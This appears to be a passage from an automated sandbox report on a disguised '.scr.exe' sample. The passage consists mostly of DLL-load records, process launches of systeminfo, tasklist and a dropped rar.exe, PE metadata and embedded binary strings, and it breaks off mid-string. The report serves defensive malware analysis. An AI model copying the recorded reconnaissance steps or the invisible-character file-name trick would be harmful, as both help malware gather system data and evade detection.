              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic file information: File size 8505922 > 1048576
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdb source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342094311.00007FF8B9071000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340877451.00007FF8B8CB1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343290926.00007FF8B9F61000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdbhPu source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342474030.00007FF8B93C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion 